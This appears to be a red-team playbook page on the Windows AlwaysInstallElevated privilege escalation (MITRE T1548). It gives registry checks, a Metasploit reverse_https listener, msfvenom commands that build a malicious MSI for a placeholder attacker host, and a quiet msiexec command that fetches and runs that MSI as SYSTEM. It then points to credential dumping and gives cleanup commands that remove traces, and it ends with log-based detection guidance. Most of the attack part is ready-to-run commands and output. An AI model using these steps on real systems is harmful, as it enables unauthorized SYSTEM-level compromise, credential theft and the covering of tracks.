Skip to main content

T1548: AlwaysInstallElevated


Technique Requirements​

Privileges RequiredAdministrator (the technique grants SYSTEM - that is the point)
Effective PermissionsSYSTEM
Triggered ByManual execution of a malicious MSI installer
Employment Complexity1/5 - Very Low (two registry checks + one msiexec command)
Detection Complexity2/5 - Low

Background​

AlwaysInstallElevated is a Windows Group Policy setting that, when enabled, instructs the Windows Installer service to install every MSI package with SYSTEM privileges - regardless of who runs the installer. It exists for environments where standard users need to install software without admin rights, but it is a severe misconfiguration: any user who can run msiexec can escalate to SYSTEM on demand.

The policy is controlled by two registry values, both must be set to 1:

  • HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
  • HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

If either value is absent or 0, the technique does not work. Both are required because the HKCU value allows the current user to request elevation, and the HKLM value allows the system to grant it - the installer checks both.

Why this is the first privesc to check: It requires zero exploitation, no service vulnerability, and no UAC bypass chain. It is either present or not. Check it during the discovery phase (T1082 Phase 6) before attempting any other privilege escalation path.


Procedures​

The following actions outline this privilege escalation plan:

  • Both AlwaysInstallElevated registry values will be verified as enabled
  • A malicious MSI payload will be generated on Kali
  • The MSI will be transferred to the victim and executed with msiexec
  • A SYSTEM Meterpreter session will be received

1. Check if AlwaysInstallElevated is enabled​

Both values must be 0x1. Run this first - if either is absent or 0, skip this technique.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Positive result (vulnerable):

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

If either key is missing or the value is 0x0, this technique will not work - msiexec will install as the current user's context rather than SYSTEM.

2. Configure payload listener​

msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"

3. Generate and serve the MSI payload​

ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o elevated.msi
python3 -m http.server 8080

4. Execute on victim - download and install in one step​

msiexec /i http://<ATTACKER_IP>:8080/elevated.msi /qn

Or if already staged to disk:

msiexec /i C:\Windows\Temp\elevated.msi /qn
FlagMeaning
/iInstall package
/qnQuiet - no UI, no prompts

The installer runs as SYSTEM regardless of the calling user's privilege level. The Meterpreter stager fires from the SYSTEM context.


What to Expect​

The session arrives as SYSTEM immediately after msiexec executes:

msf6 exploit(multi/handler) > [*] Sending stage (201798 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (0.0.0.0:443 -> 192.168.1.100:49203) at 2026-03-21 10:05:44

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

From a SYSTEM session, proceed directly to credential dumping - no UAC bypass required.

Cleanup - remove any partial installation registry entry left by the MSI:

# Check for leftover Uninstall entry:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /f "meterpreter"
# Delete if found (substitute actual GUID):
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{GUID}" /f

# Delete staged MSI if not using the direct URL method:
del /f /q C:\Windows\Temp\elevated.msi

Log Detection​

  • Source: Microsoft-Windows-Sysmon/Operational
    • EventID:1 (ProcessCreate)
      • msiexec.exe with /i and a URL or temp path argument - running as SYSTEM while the parent is a low-privileged user is the key anomaly
    • EventID:11 (FileCreate)
      • MSI written to temp path prior to execution
    • EventID:13 (Registry Value Set)
      • AlwaysInstallElevated set to 1 in either hive (if the policy was set by an attacker rather than pre-existing)
  • Source: Security
    • EventID:4688 (Process creation with command line auditing)
      • msiexec.exe /i - particularly if the parent process is an unprivileged user shell and the resulting process token is SYSTEM
  • Source: System
    • EventID:1033 / 1034 (Windows Installer product installed/removed)
      • An MSI install from an unusual path or with no recognizable product name